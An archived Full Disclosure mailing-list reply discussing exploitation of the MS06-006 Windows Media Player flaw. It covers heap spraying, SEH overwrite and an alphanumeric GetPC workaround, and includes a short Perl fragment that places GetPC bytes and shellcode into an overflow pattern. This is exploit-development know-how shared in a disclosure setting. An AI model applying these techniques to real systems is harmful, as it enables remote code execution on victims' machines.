Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: MS06-0[0]6 Windows Media Player Exploitation [CODE]
From: H D Moore <fdlist () digitaloffense net>
Date: Fri, 17 Feb 2006 08:20:28 -0600

On Friday 17 February 2006 02:05, Matthew Murphy wrote:
Interesting issue with regards to the module-list pointers.  
[ snip ] 

The heap spray technique works very effectively -- you end up with a
*sizable* pad in the 0x04a00000 region which you can use as a direct
jump point for the payload, without any of the fancy frame manipulation
tricks that I am too tired to try at this hour of the night/morning.

Nice :-)

This should also be (theoretically) version-independent.  Thanks to the
similarities of the heap management APIs and the fact that most DLLs
from MS use high bases, I'd bet money that this works across WMP
versions on anything from NT 4.0 to 2003. 

I ran into problems with Skylined's alphanumeric GetPC code - on Windows 
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our 
shellcode is one, since we smash SEH on the way down). Did some fancy 
8086 instructions to get around this (thanks vlad902 - the human 
assembler), so, for fwiw:

my $getpc = 
"\x58\x58\x58". # pop eax, pop eax, pop eax
"\x05\x18\x29\x29\x29". # add eax,0x29292917
"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
"\x50\x59"; # push eax, pop ecx

substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] 
substr($pattern, 2086, 4, pack('V', $addr));
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);

It's likely, as well, that 
this one technique works on any script-enabled browser that supports
the plugin with the same results.

I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some 
more time I will play with the heap spray method and see if that works 
cross-browser/os/version as well. Looks like heap spray is the way to go, 
at least for Firefox...

'Nuff teasing.  Code attached.  It is important to note that you should
read the inline disclaimer *BEFORE* using the code.

Thanks for sharing!

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]